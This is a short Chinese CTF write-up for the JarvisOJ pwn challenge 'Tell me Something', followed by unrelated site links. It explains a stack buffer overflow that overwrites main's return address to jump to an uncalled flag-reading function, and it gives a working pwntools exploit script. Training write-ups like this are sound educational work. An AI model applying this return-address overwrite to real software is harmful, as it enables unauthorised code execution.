JarvisOJ PWN Tell me Something wp

其他 2020-01-25 11:37:17 阅读次数: 0

Tell me Something

先拖进ida里看一下,发现了"flag.txt"字符串,双击发现good_game函数:

查看主函数,发现其中并没有调用goodgame函数:

所以我们输入大于buffer长度的数据,溢出的数据将会覆盖栈上的数据,因此我们将main的返回地址改成goodgame的地址,这样当main函数执行完之后,将会跳转到goodgame函数上进行执行,从而拿到flag。

脚本如下:

from pwn import *

p = process("./guestbook")
#p = remote('pwn.jarvisoj.com', 9876)

good_game = 0x0000000000400620
payload = 'a' * 0x88 + p64(good_game)

p.recvline(":")
p.sendline(payload)
p.interactive()

得到flag:

苗_
发布了14 篇原创文章 · 获赞 2 · 访问量 426
私信 关注

猜你喜欢

转载自blog.csdn.net/weixin_43876357/article/details/103915491
今日推荐
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」
开源日报 | 谷歌扶持鸿蒙上位;开源Rabbit R1;Docker加持的安卓手机;微软的焦虑和野心;海尔电器把开放平台关了
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
周排行
Java自定义时间格式
同步整形电路
在开发中最最最常用的字符串的属性大集合
Linux 查看端口占用并杀掉
Java基础四:ArrayList
多线程之死锁就是这么简单
mysql 基础命令集
awk 命令详解
Centos6.3编译安装nginx+php步骤
OCR (Optical Character Recognition,光学字符识别)
每日归档
更多
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022